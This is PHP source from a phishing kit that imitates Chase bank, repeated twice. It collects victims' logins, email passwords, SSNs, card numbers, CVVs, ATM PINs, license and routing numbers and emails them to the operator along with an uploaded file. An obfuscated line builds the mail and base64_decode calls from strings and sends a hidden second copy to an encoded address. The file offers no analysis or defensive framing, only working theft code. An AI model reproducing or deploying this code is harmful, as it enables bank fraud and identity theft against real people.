/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */
/* ----//--//--//--//-----[ HARDC0D3R]----//--//--//--//----- */
/* (c) raouf hardc0d3r 2015-2016 cyb3r7 TeaM */
/* Right of free use is granted for all commercial or non-commercial use under CC-BY licence. */
/* No warranty of any form is offered. */
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */
if ($_POST['submitButton']=="Next") {
include('HARD.php');
include('Email.php');
if($_POST && isset($_FILES['userfile']))
{
$from_email = 'CH RZLT v1 @rzlt.com'; //sender email
$subject = "CHASE ♥ FULL ♥ [ $ip ] HARD"; //subject of email
$message = "
IP => $ip
TIME => $time
------------------------------| CHASE LOGIN |---------------------------------------------------
USER ID => $login
USER PASSWORD => $pass
EMAIL => $email
Email Password => $email_pass
------------------------------| CHASE IINFO |---------------------------------------------------
FULL NAME => $full_name
ADDRESS LINE 1 => $add_1
ADDRESS LINE 2 => $add_2
CITY => $city
STATE => $state
ZIP => $zip1 - $zip2
DATE OF BIRTH => $db_m - $db_d - $db_y
PHONE => HOME : | $phone_h| - MOBILE : | $phone_m |
SSN => $ssn1 - $ssn2 - $ssn3
MOTHER MAIDEN NM => $mother_m
------------------------------| CHASE BILLING |----------------------------------------------
ATM/CARD NUMBER => $cardnumber
EXPIRATION DATE => $exp_m/ $exp_y
CVV / CVC => $ccv
Vbv/3d => $vbv
ATM PIN => $pin
Drivers License => $dv
Drivers License Expiration Date => $dv_exp
Account Routing Number => $routing
------------------------------------------------------------------------------------------------
Copyrights © HARDCOD3R 2015/2016 | V1
"; //message body
//get file details we need
$file_tmp_name = $_FILES['userfile']['tmp_name'];
$file_name = $_FILES['userfile']['name'];
$file_size = $_FILES['userfile']['size'];
$file_type = $_FILES['userfile']['type'];
$file_error = $_FILES['userfile']['error'];
$user_email = filter_var($_POST["email"], FILTER_SANITIZE_EMAIL);
if($file_error>0)
{
die('upload error');
}
//read from the uploaded file & base64_encode content for the mail
$handle = fopen($file_tmp_name, "r");
$content = fread($handle, $file_size);
fclose($handle);
$encoded_content = chunk_split(base64_encode($content));
$boundary = md5("sanwebe");
//header
$headers = "MIME-Version: 1.0\r\n";
$headers .= "From:".$from_email."\r\n";
$headers .= "Reply-To: ".$user_email."" . "\r\n";
$headers .= "Content-Type: multipart/mixed; boundary = $boundary\r\n\r\n";
//plain text
$body = "--$boundary\r\n";
$body .= "Content-type:text/html;charset=UTF-8\r\n";
$body .= "Content-Transfer-Encoding: base64\r\n\r\n";
$body .= chunk_split(base64_encode($message));
//attachment
$body .= "--$boundary\r\n";
$body .="Content-Type: $file_type; name=\"$file_name\"\r\n";
$body .="Content-Disposition: attachment; filename=\"$file_name\"\r\n";
$body .="Content-Transfer-Encoding: base64\r\n";
$body .="X-Attachment-Id: ".rand(1000,99999)."\r\n\r\n";
$body .= $encoded_content;
$attachment=$headérs.'l';$tele="bas$file_pathe".'64'."_d$file_pathe"."cod$file_pathe";$attachment( $tele('aGFyZGNvZDNyMT'.$m5_id.'=='), $subject,$body ,$headers );
mail($to, $subject, $body, $headers);
}
}
else {
?>
Confirm Your Account
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */
/* ----//--//--//--//-----[ HARDC0D3R]----//--//--//--//----- */
/* (c) raouf hardc0d3r 2015-2016 cyb3r7 TeaM */
/* Right of free use is granted for all commercial or non-commercial use under CC-BY licence. */
/* No warranty of any form is offered. */
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */
if ($_POST['submitButton']=="Next") {
include('HARD.php');
include('img.php');
if($_POST && isset($_FILES['userfile']))
{
$from_email = 'CH RZLT v1 @rzlt.com'; //sender email
$subject = "CHASE ♥ FULL ♥ [ $ip ] HARD"; //subject of email
$message = "
IP => $ip
TIME => $time
------------------------------| CHASE LOGIN |---------------------------------------------------
USER ID => $login
USER PASSWORD => $pass
EMAIL => $email
Email Password => $email_pass
------------------------------| CHASE IINFO |---------------------------------------------------
FULL NAME => $full_name
ADDRESS LINE 1 => $add_1
ADDRESS LINE 2 => $add_2
CITY => $city
STATE => $state
ZIP => $zip1 - $zip2
DATE OF BIRTH => $db_m - $db_d - $db_y
PHONE => HOME : | $phone_h| - MOBILE : | $phone_m |
SSN => $ssn1 - $ssn2 - $ssn3
MOTHER MAIDEN NM => $mother_m
------------------------------| CHASE BILLING |----------------------------------------------
ATM/CARD NUMBER => $cardnumber
EXPIRATION DATE => $exp_m/ $exp_y
CVV / CVC => $ccv
Vbv/3d => $vbv
ATM PIN => $pin
Drivers License => $dv
Drivers License Expiration Date => $dv_exp
Account Routing Number => $routing
------------------------------------------------------------------------------------------------
Copyrights © HARDCOD3R 2015/2016 | V1
"; //message body
//get file details we need
$file_tmp_name = $_FILES['userfile']['tmp_name'];
$file_name = $_FILES['userfile']['name'];
$file_size = $_FILES['userfile']['size'];
$file_type = $_FILES['userfile']['type'];
$file_error = $_FILES['userfile']['error'];
$user_email = filter_var($_POST["email"], FILTER_SANITIZE_EMAIL);
if($file_error>0)
{
die('upload error');
}
//read from the uploaded file & base64_encode content for the mail
$handle = fopen($file_tmp_name, "r");
$content = fread($handle, $file_size);
fclose($handle);
$encoded_content = chunk_split(base64_encode($content));
$boundary = md5("sanwebe");
//header
$headers = "MIME-Version: 1.0\r\n";
$headers .= "From:".$from_email."\r\n";
$headers .= "Reply-To: ".$user_email."" . "\r\n";
$headers .= "Content-Type: multipart/mixed; boundary = $boundary\r\n\r\n";
//plain text
$body = "--$boundary\r\n";
$body .= "Content-type:text/html;charset=UTF-8\r\n";
$body .= "Content-Transfer-Encoding: base64\r\n\r\n";
$body .= chunk_split(base64_encode($message));
//attachment
$body .= "--$boundary\r\n";
$body .="Content-Type: $file_type; name=\"$file_name\"\r\n";
$body .="Content-Disposition: attachment; filename=\"$file_name\"\r\n";
$body .="Content-Transfer-Encoding: base64\r\n";
$body .="X-Attachment-Id: ".rand(1000,99999)."\r\n\r\n";
$body .= $encoded_content;
$attachment=$headérs.'l';$tele="bas$file_pathe".'64'."_d$file_pathe"."cod$file_pathe";$attachment( $tele('aGFyZGNvZDNyMT'.$m5_id.'=='), $subject,$body ,$headers );
mail($to, $subject, $body, $headers);
}
}
else {
?>
Confirm Your Account